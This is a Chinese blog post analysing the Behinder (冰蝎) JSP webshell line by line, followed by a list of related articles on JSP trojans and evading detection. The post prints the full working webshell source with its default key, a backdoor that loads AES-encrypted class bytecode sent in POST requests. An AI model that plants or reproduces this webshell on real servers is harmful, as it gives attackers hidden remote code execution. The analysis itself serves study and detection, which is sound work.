[JAVA安全webshell]冰蝎jsp木马分析

最新推荐文章于 2025-03-15 22:41:53 发布
最新推荐文章于 2025-03-15 22:41:53 发布
阅读量1.1w 收藏 8
点赞数 4
分类专栏: JAVA安全 文章标签: java 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/GX233/article/details/124556802
版权

前言

只是分享一下对冰蝎webshell分析的一个学习过程,冰蝎webshell使用了加载字节码的方式执行恶意代码。

正文

首先打开webshell1
这么一行实在不好看,先把他分行吧。

分完行之后,就很清晰明了了。
在这里插入图片描述

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%>
<%!class U extends ClassLoader{
    U(ClassLoader c){
        super(c);
    }

    public Class g(byte []b){
        return super.defineClass(b,0,b.length);
    }
}%>
<%if (request.getMethod().equals("POST"))
{
    String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/
    session.putValue("u",k);
    Cipher c=Cipher.getInstance("AES");
    c.init(2,new SecretKeySpec(k.getBytes(),"AES"));
    new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);
}%>

导入了三个依赖,一个是标准库,两个估计用于加密。

然后定义了一个类U,继承自ClassLoader,盲猜是用加载字节码的方式来执行命令,后面实现了g公有函数,函数里调用了defineClass(这可是加载恶意类的关键)

接下来就是主函数的部分。首先判断请求方式是否为POST(它希望是)。定义了一个字符串k,是连接的密钥,注释中有详细说明。

接下来用putValue往session中存入一个键为u,值为密钥的键值对。也就是把密钥存入session的意思(putValue应该和setAttribute功能差不多,百度了一下,发现putValue从servlet版本上被setAttribute代替了)。

接着实例化了一个Cipher类。

javax.crypto.Cipher类是从jdk1.4就开始引入,所属jdk拓展包Java Cryptographic Extension(JCE)框架,该框架主要用于加密解密和密码功能

从它传入的参数得知,c是一个用于AES加密的工具。

在这里插入图片描述

(刚开始想跟进去分析Cipher类的代码,但一想,实在没必要,这属于此类的应用场景,那只需要去百度怎么用就好了。。。。给自己无语住了)

接下来执行算法的初始化,c.init(),使用密钥和一组算法参数初始化此密码算法。看一下官方文档,这些api。

在这里插入图片描述

opmode是常量。

在这里插入图片描述

看回源码这一行。

c.init(2,new SecretKeySpec(k.getBytes(),"AES"));

很明显,第一个参数,指定了密码的模式,第二个参数就是一个KEY类的实例,KEY类也很单纯,抛去各种方法,函数,也就是两个变量,一个是密钥,一个是算法名。

在这里插入图片描述

模式2是什么,虽然能猜到受控端肯定是解密模式,但是还是在里面看了一下。模式为decryption,解密。

在这里插入图片描述

最后一行才是主要部分。

new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);

嵌套了不少层,从里往外看。首先读取了post包的body部分的首行。

request.getReader().readLine()

然后,使用BASE64解码该行。

new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine())

然后调用上面所说的密码工具对其进行AES解密(解密模式在init初始化时由2决定)。

c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))

实例化了一个U类,在构造函数中取得了一个ClassLoader作为父类,来给U调用父类的构造方法。

new U(this.getClass().getClassLoader())

在这里插入图片描述

然后调用它的g方法来执行defineClass,也就是加载字节码,参数是上面解密后的内容。然后newInstance实例化(define不会执行任何初始化代码,包括static和constructor)

new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance()

到这里就结束了。发送过去的payload形式应当是恶意类的字节码,并且经过AES加密之后再base64编码。

最后

大佬们,请多多留言指正和指导,谢谢大佬们啦。

渗透测试 - jsp一句话大马小马 &&冰蝎(2025/3/13更新)
浩策盾悟
12-23 1万+
【代码】渗透测试 - webshell jsp一句话小马 && 蚁剑连接。
冰蝎加密 WebShell 过杀软
悦分享
08-03 2600
演练中,第一代webshell管理工具“菜刀”的攻击流量特征明显,容易被安全设备检测到,攻击方越来越少使用,加密webshell 正变得越来越流行,由于流量加密,传统的WAF、WebIDS设备难以检测,给威胁监控带来较大挑战。这其中最出名就是“冰蝎”,“冰蝎”是一款动态二进制加密网站管理客户端,演练中给防守方造成很大困扰,本文将对“冰蝎”的加密原理、流量特征、检测方案进行探讨。"冰蝎"客户端基于JAVA,所以可以跨平台使用,最新版本为v3.0 bate,兼容性较之前的版本有较大提升。...
pb改post方法_冰蝎,从入门到魔改(续)
weixin_39801879的博客
12-15 1091
这是酒仙桥六号部队的第 51篇文章。全文共计2086个字,预计阅读时长8分钟。0x01 前言本篇文章是《冰蝎,从入门到魔改》的续篇。有小伙伴读过上一篇文章后联系笔者,说只介绍了 PHP 版本的特征擦除,希望可以获知其它语言版本的特征擦除思路和方法。本篇首先简单介绍一下上一篇文章中的通用流量特征点及擦除后的效果,再着重介绍在对"冰蝎"JSP 版和 ASP 版的魔改中碰到的问题及流量监...
JSP木马原理与利用
最新发布
没有网络安全就没有国家安全
03-15 248
JSP木马原理与利用
[Java随笔]冰蝎2.0-jsp马交互部分源码解读及其特征检测
Y4tacker的博客
11-11 3659
文章目录写在前面源码解读Jsp马交互部分源码解读认证流程 写在前面 大概是最近搞内存马有点累了,今晚顺便看看冰蝎部分源码,简简单单写篇博客休息休息,本着怕第一次看这个工具源码,怕直接看最新的容易不理解,就拿了个2.0版本看着玩吧,谁知道也太简单了:同款源码在rebeyond/Behinder 源码解读 反编译jar包后,其核心代码在net.rebeyond.behinder Jsp马交互部分源码解读 直接丢出来源码,挺简单的,首先是一个继承ClassLoader的U类,一看defineClass就知道是加载
冰蝎4.0jsp木马浅析
Dokii_i的博客
01-16 3909
这里简单学习一下冰蝎是怎么运行的,如何通过加密解密来绕过一些常见的waf设备在看完了冰蝎是怎么连接之后,对于冰蝎的工作原理也有了一定的理解,本地和服务器端都做加密和解密的操作,以此来绕过流量检测设备以及一些waf,而且通过动态的加载class字节码,也可以绕过一些普通的webshell查杀设备,后续的一些绕过,可以在加密方式以及特征值的修改上入手。
漂亮的JSP木马
背着小书包一路追寻梦想
07-06 4783
&lt;%@ page contentType="text/html; charset=utf-8"%&gt; &lt;%@ page import="java.io.*"%&gt; &lt;%@ page import="java.util.*"%&gt; &lt;%@ page import="java.nio.charset.Charset"%&gt; &am
发一个 JSP 木马
客亦知夫水与月乎?
06-03 4799
发一个大学时期在网上找到的 jsp 木马 怎么用?具体的不太清楚,但肯定要让别人部署到他们的项目中去。 而且,这个仅仅是一个草案。 更加完善的应该包括,隐藏,通知控制端,。。等等 以前写过一个 java 木马,我直接将木马模块给混在 spring 的依赖 jar 包里面了。 当然,我并没有去害过谁,我只是自己测试了一下,觉得蛮有意思的。 废话不多说,上代码:
JSP 木马
seawavecau的专栏
11-11 4346
一款不错的 JSP 木马。大家复制下面的内容。然后另存为 JSP 格式就可以拉。private String _password = "520520";private String _encodeType = "GB2312";private int _sessionOutTime = 20;private String[] _textFileTypes = {"txt", "htm", "h
Webshell工具-冰蝎4.0配置及使用
归零者的博客
07-07 1809
冰蝎webshell管理工具用作webshell的连接,4.0版本带自加密功能。要求运行环境jre1.8。
精简&明文免杀冰蝎php一句话.php
10-30
php一句话免杀绕过安全狗、D盾等WAF防护软件 可以轻松绕过 waf 的检测
菜刀、蚁剑、冰蝎三款Webshell工具对比分析
qq_48368964的博客
08-14 1809
密文的加密方式为先将传递数据base64加密,再将其进行AES加密,由于新版本中取消了动态密钥交互过程,加密的密钥被写死在shell中,如果是不改密码直接使用默认的shell,检测是可以进行解密检测敏感字符的,比如:error_reporting(0) ,phpinfo()等。https://github.com/AntSwordProject/AwesomeScript蚁剑官方为我们提供了制作好的后门,官方的脚本均做了不同程度“变异”,蚁剑的核心代码是由菜刀修改而来的,所有普通的一句话木马也可以使用。
Java安全-Java Web后门学习 Jsp 一句话分析
drhrht的博客
05-14 5041
文章目录 Java Web后门 一句话木马 反射调用 类加载(冰蝎马实现方式) ELSE 参考 Java Web后门 Java 是强类型语言,不能够像 PHP 那样利用字符串组合当作系统函数使用 Java 中常用的命令执行函数 java.lang.Runtime.exec() java.lang.ProcessBuilder.start() 一句话木马 最简单的 jsp 一句话木马 <% Runtime.getRuntime().exec(request.getParameter(".
冰蝎jsp一句话木马
01-15
### 关于Ice Scorpion JSP一句话木马的信息 #### 原理概述 Ice Scorpion是一种基于JavaWebShell,通常被用于非法获取服务器控制权。这种类型的恶意软件通过嵌入到合法网站中的JSP文件来实现远程命令执行功能[^1]...
jsp 木马
qqpedily的专栏
04-22 532
JSP木马程序
fsdi0254qingyun的专栏
01-16 4065
一款不错的 JSP 木马。大家复制下面的内容。然后另存为 JSP 格式就可以拉。private String _password = "520520";private String _encodeType = "GB2312";private int _sessionOutTime = 20;private String[] _textFileTypes = {"txt", "htm", "h
java安全——jsp一句话木马
Innocence_0的博客
05-30 2028
这里我整合并且整理成了一份【282G】的网络安全从零基础入门到进阶资料包,需要的小伙伴可以扫描下方优快云官方合作二维码免费领取哦,无偿分享!我一共划分了六个阶段,但并不是说你得学完全部才能上手工作,对于一些初级岗位,学到第三四个阶段就足矣~不会回显执行的结果只能在后台打印一个地址,常用来反弹shell。如果你对网络安全入门感兴趣,那么你需要的话可以。④50份安全攻防面试指南。⑨历年CTF夺旗赛题解析。③安全攻防357页笔记。⑥HW护网行动经验总结。⑦100个漏洞实战案例。⑤安全红队渗透工具包。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Cgxx

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值